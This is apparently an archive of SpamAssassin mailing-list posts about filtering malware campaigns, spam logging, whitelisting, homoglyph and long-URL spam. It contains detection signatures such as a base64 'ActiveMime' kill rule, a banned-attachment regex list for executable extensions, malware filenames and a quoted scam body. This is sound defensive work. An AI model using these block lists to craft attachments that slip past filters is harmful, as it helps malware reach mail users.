key corpora.  We also tested 2013 & 2014 ham-only for a few of
the most useful corpora, for a grand total of about 1.4 million
individual emails.

We found exactly zero hits on ham. :)
Not counting "my" SA list digest.

That rule is now live on all our systems, at Exterminate score.

We'll be doing a few more corpora in the next two weeks, and if
there's any hits, I'll report back.

While it is hypothetically possible that somebody would send a
document with ActiveMime, I personally am trusting my quarantine
sytem to detect those.  We can individually "skip" list that rule
if needed, just like we already do with Word macros and other
Pakled-icity. ;)
- "Chip"

malware campaign: javascript in ".tgz"

[Chip M.]

Starting about two hours ago, about 40% of my real-time
honeypot spam is a new malware campaign.  About a third are
hitting "BAYES_00", with about 10% of all having negative SA
scores. :(

Full spample (with munged email addresses):
http://puffin.net/software/spam/samples/0040_mal_tgz.txt
That's not a valuable honeypot address, so I've left everything
else as-is, including the Message-ID.

So far, all of these have the _EXACT_ same Message-ID, From,
and Reply-To.  I expect all to change, but they may be useful
for quick block rules.  The From account is "FSPRD" and the 
>From base domain is "covance".

The filenames are all the same length, pure numeric with three
leading zeroes.  Here's a few examples:
0006449538.tgz
0007184777.tgz
0008205464.tgz
0007565676.tgz
0008113861.tgz
0001457696.tgz
0007535057.tgz
0008403752.tgz
0009470013.tgz


I'm blocking these by file extension (both ".tgz" and ".gz" to
be extra cautious).
A couple of years ago, I added a "mime prefix" rule to my post-SA
filter, and have added rules using that, in case the spammers try
the old trick of asking victims to rename the file.

I tried opening a benign ".gz" in Windows7, and it didn't
recognize it, but other versions may.  These may be targeting
other platforms (e.g. I recently learned that Chrome OS has native
support for "rar" extraction, which may explain the recent rise of
rar javascript email malware).

I've only taken a quick look at the payload.  It's javascript, but
definitely different from past campaigns.

I've been seeing a high level of "calibration" spam for over a
week, so I suspect this is a new botnet going live. :(
- "Chip"

new(ish) malware: RTF with MIME payload

[Chip M.]

Starting about two hours ago, more than 80% of my real-time
honeypot spam is a new malware campaign.

Full spample (with redacted/munged email addresses and
Message-ID):
http://puffin.net/software/spam/samples/0039_mal_rtf_mime.txt

This is a variation on an XML file malware campaign that briefly
spewed a year ago this month.

The big difference is the Content Types of the payload, which,
so far, are of three forms:

Content-Type: application/x-rtf;
name="Invoice_MKUBV53827_from_tip_top_delivery.rtf"

Content-Type: application/octet-stream;
name="Invoice_MKUBV53827_from_tip_top_delivery.rtf"

Content-Type: application/rtf;
name="Invoice_MKUBV53827_from_tip_top_delivery.rtf"

Note: I normalized all the filenames to be the same as the 
sample (i.e. "MK...").  All have been in the form A9.


*** The key very-safe-to-nuke signature (in the rtf) is:
QWN0aXZlTWltZQ
The ".mso" "name" fields have had considerable variation, both 
in length and content.
The MIME string "QWN0aXZlTWltZQ" decodes to "ActiveMime", which
immediately struck me as Dangerous Sounding. :)  So for the 
last year I've been using that as a Kill rule, specificially:

spamassassin logging

[Rajesh M]

hi

we are using qmailtoaster with spamassassin

currently the spamassasin log details show as such

is it possible to log the detailed information in the log files ?

ie sender email , recipient email spam rules applied and the spam score.

thanks,
rajesh

spamassassin detailed logging

[Rajesh M]

hi

i am using qmailtoaster on centos6.6 64 bit

is there a way to have detailed logging for spamassassin

which includes the sender and the recepient and the scan result.

my current logs are as such which does not show the

Jun 19 18:31:45 ns1 spamd[48983]: spamd: connection from localhost [127.0.0.1] 
at port 48151
Jun 19 18:31:45 ns1 spamd[48983]: spamd: processing message 
201506191258.t5jcvxh5015...@to5email3.gprs.rogers.com for clamav:89
Jun 19 18:31:45 ns1 spamd[41557]: spamd: connection from localhost [127.0.0.1] 
at port 48152
Jun 19 18:31:45 ns1 spamd[41557]: spamd: processing message 
002901d0aa90$10a07c70$31e17550$@com for clamav:89
Jun 19 18:31:45 ns1 spamd[48981]: spamd: clean message (0.0/5.0) for clamav:89 
in 3.5 seconds, 38701 bytes.
Jun 19 18:31:45 ns1 spamd[48981]: spamd: result: . 0 - HTML_MESSAGE 
scantime=3.5,size=38701,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48134,mid=008501d0aa90$0d4ce4a0$27e6ade0$@net,autolearn=disabled
Jun 19 18:31:45 ns1 spamd[48982]: spamd: clean message (0.0/5.0) for clamav:89 
in 3.5 seconds, 38701 bytes.
Jun 19 18:31:45 ns1 spamd[48982]: spamd: result: . 0 - HTML_MESSAGE 
scantime=3.5,size=38701,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48135,mid=008501d0aa90$0d4ce4a0$27e6ade0$@net,autolearn=disabled
Jun 19 18:31:45 ns1 spamd[48983]: spamd: identified spam (23.6/5.0) for 
clamav:89 in 0.7 seconds, 6395 bytes.
Jun 19 18:31:45 ns1 spamd[48983]: spamd: result: Y 23 - 
ADVANCE_FEE_5_NEW_MONEY,AXB_XMAILER_MIMEOLE_OL_024C2,FAKE_REPLY_C,FORGED_OUTLOOK_HTML,FORGED_OUTLOOK_TAGS,FROM_MISSPACED,FROM_MISSP_MSFT,FROM_MISSP_REPLYTO,FROM_MISSP_USER,FROM_MISSP_XPRIO,FROM_NOT_REPLYTO,FSL_CTYPE_WIN1251,FSL_NEW_HELO_USER,HTML_MESSAGE,LOTS_OF_MONEY,MIME_HTML_ONLY,MISSING_HEADERS,MONEY_FRAUD_8,MONEY_FROM_MISSP,MSOE_MID_WRONG_CASE,NSL_RCVD_FROM_USER,REPLYTO_WITHOUT_TO_CC,TO_NO_BRKTS_FROM_MSSP,TO_NO_BRKTS_MSFT,T_MONEY_PERCENT,T_US_DOLLARS_3
 
scantime=0.7,size=6395,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48151,mid=201506191258.t5jcvxh5015...@to5email3.gprs.rogers.com,autolearn=disabled
Jun 19 18:31:45 ns1 spamd[22330]: spamd: handled cleanup of child pid [48983] 
due to SIGCHLD: interrupted, signal 2 (0002)
Jun 19 18:31:46 ns1 spamd[41557]: spamd: clean message (-100.0/5.0) for 
clamav:89 in 1.0 seconds, 106108 bytes.
Jun 19 18:31:46 ns1 spamd[41557]: spamd: result: . -99 - 
HTML_MESSAGE,UNPARSEABLE_RELAY,USER_IN_WHITELIST 
scantime=1.0,size=106108,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48152,mid=002901d0aa90$10a07c70$31e17550$@com,autolearn=disabled
Jun 19 18:31:46 ns1 spamd[22330]: spamd: handled cleanup of child pid [48982] 
due to SIGCHLD: interrupted, signal 2 (0002)
Jun 19 18:31:49 ns1 spamd[26182]: spamd: identified spam (5.0/5.0) for 
clamav:89 in 16.1 seconds, 344646 bytes.
Jun 19 18:31:49 ns1 spamd[26182]: spamd: result: Y 5 - 
FILL_THIS_FORM,HTML_MESSAGE,headerSPFFAIL 
scantime=16.1,size=344646,user=clamav,uid=89,required_score=5.0,rhost=localhost,raddr=127.0.0.1,rport=48119,mid=902443c7db414511a3be04e9b7f663a9@ZUARIMB2.ADVENTZ.LOCAL,autolearn=disabled

thankyou
raj

check size of email

[Rajesh M]

hi

is there anyway to check the size of emails or count the number of characters 
in an email using spamassassin ?

basically i wish to mark emails that are less than 2 kb in size with long links 
in them as spam since they mostly spam.

also is there any way to check if a word / excel document contains macros. (i 
do not wish to use clam av.)

rajesh

spamassassin service slow to start

[Rajesh M]

hi

am using qmailtoaster, centos 6 - 64 bit with spamassassin, dovecot, vpopmail, 
spamdyke, squirrelmail

dell server : intel hexcore 2.2 ghz proc, 16 gb ram

i have several such servers.

on one of my servers all of a sudden there was a high cpu utilization which 
continued the whole day -- all 12 cpu cores close to 100 percent continuously.

the following checks were done.

1) incoming smtp connections -- were normal - around 10 -20 simultaneous 
connections -- which is normal

2) turned of clamd - but not a significant impact

3) turned of spamassassin - cpu usage reduced a lot.

4) spamassassin -- service spamd stop -- works quickly.
service spamd start takes over a minute to start.
normally it does not take more than 10 seconds to start.

also checked dmesg, httpd, maillog, /var/log/messages, restarted bind, httpd 
... but nothing wrong in this area.

the problem got resolved automatically in the night.  spamassassin starts in 
around 10 seconds.

The same problem took place happened around 3 months ago -- again got 
automatically resolved.

 could someone please give me pointers as to where to trouble shoot to find 
the root cause. 

i have posted below spammassassin --debug --lint information.

spammassassin debug lint normally takes just 3 seconds to execute

however it took over a minute during the time this problem was taking place.

also it was getting stuck for over 5 seconds under Net::DNS as seen below


Mar  1 00:43:38.475 [4437] dbg: logger: adding facilities: all
Mar  1 00:43:38.477 [4437] dbg: logger: logging level is DBG
Mar  1 00:43:38.480 [4437] dbg: generic: SpamAssassin version 3.3.2
Mar  1 00:43:38.482 [4437] dbg: generic: Perl 5.010001, PREFIX=/usr, 
DEF_RULES_DIR=/usr/share/spamassassin, LOCAL_RULES_DIR=/etc/mail/spamassassin, 
LOCAL_STATE_DIR=/var/lib/spamassassin
Mar  1 00:43:38.484 [4437] dbg: config: timing enabled
Mar  1 00:43:38.500 [4437] dbg: config: score set 0 chosen.
Mar  1 00:43:38.535 [4437] dbg: util: running in taint mode? yes
Mar  1 00:43:38.537 [4437] dbg: util: taint mode: deleting unsafe environment 
variables, resetting PATH
Mar  1 00:43:38.541 [4437] dbg: util: PATH included '/usr/lib64/qt-3.3/bin', 
keeping
Mar  1 00:43:38.543 [4437] dbg: util: PATH included '/usr/local/sbin', keeping
Mar  1 00:43:38.546 [4437] dbg: util: PATH included '/usr/local/bin', keeping
Mar  1 00:43:38.548 [4437] dbg: util: PATH included '/sbin', keeping
Mar  1 00:43:38.551 [4437] dbg: util: PATH included '/bin', keeping
Mar  1 00:43:38.553 [4437] dbg: util: PATH included '/usr/sbin', keeping
Mar  1 00:43:38.556 [4437] dbg: util: PATH included '/usr/bin', keeping
Mar  1 00:43:38.561 [4437] dbg: util: PATH included '/root/bin', which is 
unusable, dropping: No such file or directory
Mar  1 00:43:38.564 [4437] dbg: util: final PATH set to: 
/usr/lib64/qt-3.3/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
Mar  1 00:43:38.663 [4437] dbg: dns: is Net::DNS::Resolver available? yes
Mar  1 00:43:38.665 [4437] dbg: dns: Net::DNS version: 0.65
Mar  1 00:43:43.266 [4437] dbg: diag: perl platform: 5.010001 linux
Mar  1 00:43:43.268 [4437] dbg: diag: [...] module installed: Digest::SHA1, 
version 2.12
Mar  1 00:43:43.269 [4437] dbg: diag: [...] module installed: HTML::Parser, 
version 3.64
Mar  1 00:43:43.271 [4437] dbg: diag: [...] module installed: Net::DNS, version 
0.65
Mar  1 00:43:43.272 [4437] dbg: diag: [...] module installed: NetAddr::IP, 
version 4.027
Mar  1 00:43:43.273 [4437] dbg: diag: [...] module installed: Time::HiRes, 
version 1.9721
Mar  1 00:43:43.274 [4437] dbg: diag: [...] module installed: Archive::Tar, 
version 1.58
Mar  1 00:43:43.276 [4437] dbg: diag: [...] module installed: IO::Zlib, version 
1.09
Mar  1 00:43:43.277 [4437] dbg: diag: [...] module installed: Digest::SHA1, 
version 2.12
Mar  1 00:43:43.278 [4437] dbg: diag: [...] module installed: MIME::Base64, 
version 3.08
Mar  1 00:43:43.279 [4437] dbg: diag: [...] module installed: DB_File, version 
1.82
Mar  1 00:43:43.281 [4437] dbg: diag: [...] module installed: Net::SMTP, 
version 2.31
Mar  1 00:43:43.282 [4437] dbg: diag: [...] module not installed: Mail::SPF 
('require' failed)
Mar  1 00:43:43.283 [4437] dbg: diag: [...] module not installed: 
IP::Country::Fast ('require' failed)
Mar  1 00:43:43.284 [4437] dbg: diag: [...] module installed: 
Razor2::Client::Agent, version 2.84
Mar  1 00:43:43.285 [4437] dbg: diag: [...] module installed: Net::Ident, 
version 1.23
Mar  1 00:43:43.287 [4437] dbg: diag: [...] module installed: 
IO::Socket::INET6, version 2.56
Mar  1 00:43:43.288 [4437] dbg: diag: [...] module installed: IO::Socket::SSL, 
version 1.31
Mar  1 00:43:43.289 [4437] dbg: diag: [...] module installed: Compress::Zlib, 
version 2.021
Mar  1 00:43:43.290 [4437] dbg: diag: [...] module installed: Mail::DKIM, 
version 0.37
Mar  1 00:43:43.291 [4437] dbg: diag: [...] module installed: DBI, version 1.609
Mar  1 00:43:43.293 [4437] dbg: diag: [...] module installed: Getopt::Long, 

Re: Recent spate of Malicious VB attachments II

[Chad M Stewart]

I use amavis-new and block based on file type.  My users should never get legit 
executables via email, so they are sent to a quarantine.

### BLOCKED ANYWHERE
# qr'^UNDECIPHERABLE$',  # is or contains any undecipherable components
  qr'^\.(exe-ms|dll)$',   # banned file(1) types, rudimentary
  qr'^\.(exe|lha|cab|dll)$',  # banned file(1) types


  # block certain double extensions in filenames
  
qr'^(?!cid:).*\.[^./]*[A-Za-z][^./]*\.\s*(exe|vbs|pif|scr|bat|cmd|com|cpl|dll)[.\s]*$'i,



  qr'.\.(exe|vbs|pif|scr|cpl)$'i, # banned extension - basic


Which results in my admin mailbox receiving messages like the following:


 =_1424346907-90515-0
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 
 No viruses were found.
 
 Banned name: .exe,.exe-ms,in.exe
 Content type: Banned
 Internal reference code for the message is 90515-05/T9Uh2zuM5Ym6
 
 First upstream SMTP client IP address: [23.113.51.23]:56334
   23-113-51-23.lightspeed.irvnca.sbcglobal.net
 
 Received trace: ESMTP://[23.113.51.23]:56334
 
 Return-Path: nycs...@csis.dk
 From: nycs...@csis.dk
 Message-ID: 048678970043189683240541243784...@csis.dk
 Subject: Attention csis
 The message has been quarantined as: banned-T9Uh2zuM5Ym6
 
 The message WAS NOT relayed to:
 spamt...@ubefree.net:
250 2.7.0 ok, discarded, id=90515-05 - banned: .exe,.exe-ms,in.exe
 
 


-Chad

smime.p7s
Description: S/MIME cryptographic signature

Re: rule for restricting incoming email

[Rajesh M]

hi

i am using qmailtoaster

when the emails are sent to specified recepients via bcc then  there is a header
Delivered-To created which i tried to use to check

however spamassassin does not seem to check Delivered-To header

what could be the problem ?

rajesh



- Original Message -
From: David B Funk [mailto:dbf...@engineering.uiowa.edu]
To: users@spamassassin.apache.org
Sent: Tue, 10 Feb 2015 17:17:32 -0600 (CST)
Subject: Re: rule for restricting incoming email

On Tue, 10 Feb 2015, Benny Pedersen wrote:

 Antony Stone skrev den 2015-02-10 21:33:

 What happens to an email from u...@abc.com, sent to someone other than
 u...@recipient.example.com?  Won't that then be whitelisted, even though
 whoever it's addressed to hasn't asked for that (only user@recipient asked
 for
 this treatment)?

 yes add all recipient to blacklist_to, missing that will be whitelist, but
 only from whiteliste_from senders

 Also, does blacklist_to u...@recipient.example.org match on emails where
 u...@recipient.example.org is only a BCC address?

 spamassassin does not see bcc anyway imho

A BCCed recipient doesn't show up in a 'To/Cc' header (the whole point
of 'Bcc') but obviously must be listed in the envelope recipient list.
(assuming the glue your using in your system exposes that info to SA).

The blacklist_to/whitelist_to will work on the envelope recipient list
so (assuming your glue is right) Bcc shouldn't be a problem.


--
Dave Funk  University of Iowa
dbfunk (at) engineering.uiowa.eduCollege of Engineering
319/335-5751   FAX: 319/384-0549   1256 Seamans Center
Sys_admin/Postmaster/cell_adminIowa City, IA 52242-1527
#include std_disclaimer.h
Better is not better, 'standard' is better. B{

rule for restricting incoming email

[Rajesh M]

hi

i have an email id : u...@abc.com

now i need to set a rule such that u...@abc.com can receive emails only from 
specific external domains and rest all should be rejected as spam

i have set a rule as such

header MYDOMAIN_A ToCc =~ /\b(?:test\@mydomain\.com)\b/i

header MYDOMAIN_B Delivered-To =~ /\b(?:test\@mydomain\.com)\b/i

header __MYDOMAIN_C From =~ /\b(?:trustedsender\.com)

meta MYDOMAIN ( ( MYDOMAIN_A +  MYDOMAIN_B  )  0 )  ( MYDOMAIN_C == 1 )
score MYDOMAIN -100.0

meta MYDOMAIN_SPAM ( ( MYDOMAIN_A +  MYDOMAIN_B  )  0 )  ( MYDOMAIN_C == 0 )
score MYDOMAIN_SPAM 100.0

during the tests : to and cc works correctly

i send bcc email to test@mydomain. then the header contains Delivered-To

how to resolve this problem
thanks
rajesh

Whitelist one mail with multiple destinations

[M. Rodrigo Monteiro]

Hi. Here is my scenario:

Internet - MX (Postfix) - Relay (Postfix + Amavis with SpamAssassin) - Zimbra

In SpamAssassin, I have a whitelist/blacklist. All the e-mail passes
through, but Spams are taged (header and subject).

My problem is that when an e-mail comes to multiple destinations and
one of them is whitelisted, all these destinations becomes whitelisted
too.

In the real example below, the e-mail cs...@mydomain.com is
whitelisted (-200 score). An unique e-mail (spam) comes to 20, 30
destinations and one of them is cs...@mydomain.com. All the
destinations were whitelisted (-200 score).

Here is the header of one e-mail and the log of Postfix.
This behavior is SpamAssassin or Amavisd-new?



Return-Path: laura...@semarh.goias.gov.br
Received: from eticesrv007.mydomain.com (LHLO
 eticesrv007.mydomain.com) (172.26.70.7) by eticesrv007.mydomain.com
 with LMTP; Tue, 9 Sep 2014 23:31:39 -0300 (BRT)
Received: from filtrodeconteudo1.mydomain.com (unknown [172.26.2.44])
by eticesrv007.mydomain.com (Postfix) with ESMTPS id 8F987884A55;
Tue,  9 Sep 2014 23:31:39 -0300 (BRT)
Received: from localhost (localhost [127.0.0.1])
by filtrodeconteudo1.mydomain.com (Postfix) with ESMTP id B3DEB2A016F;
Tue,  9 Sep 2014 23:31:39 -0300 (BRT)
X-Virus-Scanned: amavisd-new at mydomain.com
X-Spam-Flag: NO
X-Spam-Score: -200.771
X-Spam-Level:
X-Spam-Status: No, score=-200.771 required=5 tests=[AWL=-5.000, BAYES_00=-4,
DCC_CHECK=10, RCVD_IN_MSPIKE_H2=-1.77, SPF_PASS=-0.001,
USER_IN_WHITELIST_TO=-200] autolearn=no autolearn_force=no
Received: from filtrodeconteudo1.mydomain.com ([127.0.0.1])
by localhost (intsrv044.mydomain.com [127.0.0.1]) (amavisd-new, port 10024)
with LMTP id lTZPuM5PkD9Y; Tue,  9 Sep 2014 23:31:37 -0300 (BRT)
Received: from mx1.mydomain.com (mx1.mydomain.com [MX_IP])
by filtrodeconteudo1.mydomain.com (Postfix) with ESMTPS id A55772A016D;
Tue,  9 Sep 2014 23:31:37 -0300 (BRT)
X-Greylist: delayed 636 seconds by postgrey-1.35 at
intsrv036.mydomain.com; Tue, 09 Sep 2014 23:31:24 BRT
DKIM-Filter: OpenDKIM Filter v2.9.2 mx1.mydomain.com DEEE41A0057
DMARC-Filter: OpenDMARC Filter v1.2.0 mx1.mydomain.com DEEE41A0057
Authentication-Results: intsrv036.mydomain.com; dmarc=none
header.from=semarh.goias.gov.br
Received-SPF: pass (semarh.goias.gov.br: 189.2.188.131 is authorized
to use 'laura...@semarh.goias.gov.br' in 'mfrom' identity (mechanism
'mx' matched)) receiver=intsrv036; identity=mailfrom;
envelope-from=laura...@semarh.goias.gov.br;
helo=as.segplan.go.gov.br; client-ip=189.2.188.131
Received: from as.segplan.go.gov.br (as.segplan.go.gov.br [189.2.188.131])
by mx1.mydomain.com (Postfix) with SMTP id DEEE41A0057;
Tue,  9 Sep 2014 23:31:24 -0300 (BRT)
Received: from artemis.ecomunic.goias.gov.br (unknown [10.6.1.16])
by as.segplan.go.gov.br (Postfix) with SMTP id B2D617B902;
Tue,  9 Sep 2014 23:20:34 -0300 (BRT)
X-Virus-Scanned: amavisd-new at artemis.ecomunic.goias.gov.br
Date: Tue, 9 Sep 2014 23:20:31 -0300 (BRT)
From: Web Admin laura...@semarh.goias.gov.br
Message-ID: 97597813.546385.1410315631612.javamail.r...@semarh.goias.gov.br
Subject: att
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-Originating-IP: [10.6.128.44]
X-Mailer: Zimbra 7.2.7_GA_2942 (zclient/7.2.7_GA_2942)
To: undisclosed-recipients:;


Sep  9 23:31:39 intsrv044 postfix/smtpd[22327]: B3DEB2A016F:
client=localhost[127.0.0.1]
Sep  9 23:31:39 intsrv044 postfix/cleanup[22033]: B3DEB2A016F:
message-id=97597813.546385.1410315631612.javamail.r...@semarh.goias.gov.br
Sep  9 23:31:39 intsrv044 postfix/qmgr[11246]: B3DEB2A016F:
from=laura...@semarh.goias.gov.br, size=2665, nrcpt=20 (queue
active)
Sep  9 23:31:39 intsrv044 amavis[18826]: (18826-11) Passed CLEAN
{RelayedInbound}, [IP_MX1]:35863 [189.2.188.131]
laura...@semarh.goias.gov.br -
agnaldo.l...@mydomain.com,a...@mydomain.com,ama...@mydomain.com,arno...@mydomain.com,auri...@mydomain.com,caio.pinhe...@mydomain.com,carne...@mydomain.com,c...@mydomain.com,centraldeservi...@mydomain.com,cinthya.dioge...@mydomain.com,claudiana.ama...@mydomain.com,concessao...@mydomain.com,crist...@mydomain.com,cs...@mydomain.com,cu...@mydomain.com,danielly.cu...@mydomain.com,den...@mydomain.com,et...@mydomain.com,helen...@mydomain.com,jcarlos.l...@mydomain.com,
Queue-ID: A55772A016D, Message-ID:
97597813.546385.1410315631612.javamail.r...@semarh.goias.gov.br,
mail_id: lTZPuM5PkD9Y, Hits: -200.771, size: 1984, queued_as:
B3DEB2A016F, 2073 ms
Sep  9 23:31:39 intsrv044 postfix/lmtp[20175]: A55772A016D:
to=agnaldo.l...@mydomain.com, relay=127.0.0.1[127.0.0.1]:10024,
delay=2.1, delays=0.04/0/0/2.1, dsn=2.0.0, status=sent (250 2.0.0 from
MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as B3DEB2A016F)
Sep  9 23:31:39 intsrv044 postfix/lmtp[20175]: A55772A016D:
to=a...@mydomain.com, relay=127.0.0.1[127.0.0.1]:10024, delay=2.1,
delays=0.04/0/0/2.1, dsn=2.0.0, status=sent (250 2.0.0 from
MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as B3DEB2A016F)
Sep  9 

Re: Whitelist one mail with multiple destinations

[M. Rodrigo Monteiro]

2014-09-10 10:23 GMT-03:00 David F. Skoll d...@roaringpenguin.com:
 Option 2 is to accept the message unfiltered, split it into multiple copies,
 and remail each copy so it can be scanned per-recipient.  This avoids
 the delay, but it also means you cannot reject spam with a 5xx SMTP failure
 code or you'll be blacklisted for backscatter.

How can I do it?
All my Spams passes, none are blocked. It's no problem not reject them.


 Here at Roaring Penguin, we picked Option 2 as the lesser of the two
 evils.

 Regards,

 David.

Thanks,
Rodrigo.

Re: Whitelist one mail with multiple destinations

[M. Rodrigo Monteiro]

2014-09-10 10:17 GMT-03:00 Antony Stone
antony.st...@spamassassin.open.source.it:
 On Wednesday 10 September 2014 at 14:56:06 (EU time), M. Rodrigo Monteiro
 wrote:

 Hi. Here is my scenario:

 Internet - MX (Postfix) - Relay (Postfix + Amavis with SpamAssassin) -
 Zimbra

 My problem is that when an e-mail comes to multiple destinations and
 one of them is whitelisted, all these destinations becomes whitelisted
 too.

 Looks like you want to set smtp_destination_recipient_limit = 1 in your front
 end (MX) postfix setup:

 http://postfix.1071664.n5.nabble.com/Split-multiple-recipient-mail-td48458.html

That not worked. I tested both on MX and Relay. Still the same problem.

# postconf smtp_destination_recipient_limit
smtp_destination_recipient_limit = $default_destination_recipient_limit
# postconf default_destination_recipient_limit
default_destination_recipient_limit = 1

Re: spam with hashes and

[Rajesh M.]

himy spamassassin version is : 3.2.5the body content message source is like this. how to i block these#x13DF;#x043E;m#x0440;l#x0435;t#x0435; th#x0435; #x039A;#x043E;hl'#x0455; Surv#x0435;#x0443;!#x13DF;l#x0430;#x0456;m #x0443;#x043E;ur $25 #x039A;#x043E;hl'#x0455; G#x0456;ft #x13DF;#x0430;rd!#x13B3;#x0456;nt#x0435;r #x0456;#x0455; h#x0435;r#x0435; #x0430;nd th#x0435; w#x0435;#x0430;th#x0435;r #x0456;#x0455; ch#x0456;ll#x0443;, f#x0430;ll f#x0430;#x0455;h#x0456;#x043E;n h#x0430;#x0455; #x0455;l#x043E;wl#x0443; ch#x0430;ng#x0435;d t#x043E; w#x0456;nt#x0435;r f#x0430;#x0455;h#x0456;#x043E;n. #x039A;#x043E;hl'#x0455; #x042C;r#x0456;ng#x0455; #x0443;#x043E;u #x0430;m#x0430;z#x0456;ng n#x0435;w #x0455;t#x0443;l#x0435;#x0455; w#x0456;th #x0456;t#x0455; #x13B3;#x0456;nt#x0435;r #x13DF;#x043E;ll#x0435;ct#x0456;#x043E;n#x0455;, #x0455;#x043E; #x0443;#x043E;u c#x0430;n l#x043E;#x043E;k #x0430;nd f#x0435;#x0435;l gr#x0435;#x0430;t t#x043E;#x043E;! H#x0430;v#x0435; #x0443;#x043E;u #x042C;r#x043E;w#x0455;#x0435;d th#x0435; l#x0430;t#x0435;#x0455;t w#x0456;nt#x0435;r-#x0456;n#x0455;#x0440;#x0456;r#x0435;d #x0455;t#x0443;l#x0435;#x0455; #x0430;t #x039A;#x043E;hl'#x0455;? Sh#x0430;r#x0435; #x0443;#x043E;ur f#x0430;#x0455;h#x0456;#x043E;n #x043E;#x0440;#x0456;n#x0456;#x043E;n #x0430;nd cl#x0430;#x0456;m #x0443;#x043E;ur #x039A;#x043E;hl'#x0455; g#x0456;ft c#x0430;rd!#x13AA;ll Y#x043E;u N#x0435;#x0435;d t#x043E; D#x043E; #x0456;#x0455;:1. R#x0435;g#x0456;#x0455;t#x0435;r2. #x13DF;#x043E;m#x0440;l#x0435;t#x0435; th#x0435; Surv#x0435;#x0443;3. #x13DF;l#x0430;#x0456;m Y#x043E;ur G#x0456;ft #x13DF;#x0430;rdSt#x0430;rt n#x043E;w!rajesh- Original Message -
From: Alex [mailto:mysqlstud...@gmail.com]
To: users@spamassassin.apache.org
Sent: Fri, 15 Aug 2014 22:28:49 -0400
Subject: Re: spam with hashes and 
Hi, we are getting spam with a lot of hashes  #x13AC;m#x0430 i checked out KAM.cf but not able to trap such emailsPost a sample with all the message headers to pastebin.com so it can be reviewed.
Provide information about your version of spamassassin you're currently using, and any changes you may have made (including the use of KAM.cf) to try and block them.Regards,Alex

spam with hashes and

[Rajesh M.]

hiwe are getting spam with a lot of hashes #x13AC;m#x0430i checked out KAM.cf but not able to trap such emailsany solution please ?thanksrajesh

Bypass URIBL_BLACK check for 1 domain

[M. Rodrigo Monteiro]

Hi.

How can I bypass this check only for my domain, say mydomain.com?



M. Rodrigo Monteiro
fale...@rodrigomonteiro.net  http://twitter.com/MarcioRodrigoM/
http://www.facebook.com/mrodrigom/
http://br.linkedin.com/pub/m%C3%A1rcio-rodrigo-de-oliveira-monteiro/28/491/3b8
  http://foursquare.com/marciorodrigom fale...@rodrigomonteiro.net
fale...@rodrigomonteiro.net
Free as in Freedom, not free as in free beer
As we are liberated from our own fear, our presence automatically
liberates others
Linux User # 403730

Pense antes de imprimir. Think before printing.

AVISO LEGAL
Esta mensagem é destinada exclusivamente para a(s) pessoa(s) a quem é
dirigida, podendo conter informação confidencial e/ou legalmente
privilegiada. Se você não for destinatário desta mensagem, desde já fica
notificado de abster-se a divulgar, copiar, distribuir, examinar ou, de
qualquer forma, utilizar a informação contida nesta mensagem, por ser
ilegal. Caso você tenha recebido esta mensagem por engano, pedimos que nos
retorne este E-Mail, promovendo, desde logo, a eliminação do seu conteúdo
em sua base de dados, registros ou sistema de controle. Fica desprovida de
eficácia e validade a mensagem que contiver vínculos obrigacionais,
expedida por quem não detenha poderes de representação.

LEGAL ADVICE
This message is exclusively destined for the people to whom it is directed,
and it can bear private and/or legally exceptional information. If you are
not addressee of this message, since now you are advised to not release,
copy, distribute, check or, otherwise, use the information contained in
this message, because it is illegal. If you received this message by
mistake, we ask you to return this email, making possible, as soon as
possible, the elimination of its contents of your database, registrations
or controls system. The message that bears any mandatory links, issued by
someone who has no representation powers, shall be null or void.

Re: Bypass URIBL_BLACK check for 1 domain

[M. Rodrigo Monteiro]

2014-07-29 13:18 GMT-03:00 Benny Pedersen m...@junc.eu:

   disabling html postings with big signature could be a start?

How does disabling html helps me?
If you do have the answer for what I've asked, then it's fine to respond my
question, like Axb did.
If not, please don't bother to answer.

Sent with AquaMail for Android
 http://www.aqua-mail.com

Best regards,
Rodrigo.

block newletter type spam with long url

[Rajesh M.]

hiwe are getting spam with long url links to external websites. some times the links are hundreds of characters long.few examples given belowbasically i need to block any url which contains several alphanumeric characters at the end.http://domainname.com/dfd/b7e7c7f=a5d66e_a4404d9is there any rule to block these ?could somebody guide me on this please ?thank you,rajesh

Re: block newletter type spam with long url

[Rajesh M.]

but i need such a rule. if you can guide me please let me know.- Original Message -
From: Axb [mailto:axb.li...@gmail.com]
To: users@spamassassin.apache.org
Sent: Wed, 23 Jul 2014 09:32:38 +0200
Subject: Re: block newletter type spam with long url
Seems you are repeating yourselfOn 07/23/2014 09:09 AM, Rajesh M. wrote: hi we are getting spam with long url links to external websites. some times the links are hundreds of characters long. few examples given below basically i need to block any url which contains several alphanumeric characters at the end.Not a very good idea. Lots of legitimate mail has such URL patterns

Re: block newletter type spam with long url

[Rajesh M.]

kevincan you please post the kam.cf file online ?i understand some basics but am not good at these. rajesh- Original Message -
From: Kevin A. McGrail [mailto:kmcgr...@pccc.com]
To: axb.li...@gmail.com,users@spamassassin.apache.org
Sent: Wed, 23 Jul 2014 08:31:28 -0400
Subject: Re: block newletter type spam with long url
On 7/23/2014 3:32 AM, Axb wrote: basically i need to block any url which contains several alphanumeric  characters at the end. Not a very good idea. Lots of legitimate mail has such URL patternsAgreed. We have seen some patterns with these URLs that we block in KAM.cf but only as a meta.Regards,KAM

block newletter type spam with long url

[Rajesh M.]

hiwe are getting spam with long url links to external websites. some times the links are hundreds of characters long.few examples given belowis there any rule to block these ?basically i need to block any url which contains several alphanumeric characters at the end.http://x.com/uquote/b7e7c7f955d9af8c5ef=a5d66e_a4404d9http://www..us/l/lt1N2743MF255X/719V2211P5437V161thank you,rajesh

[Fwd: Rule Update!]

[David Alexandre M. de Carvalho]

Good morning.
I can also confirm that the rules were updated on my server.
Thanks!

No new rules since April 19th?

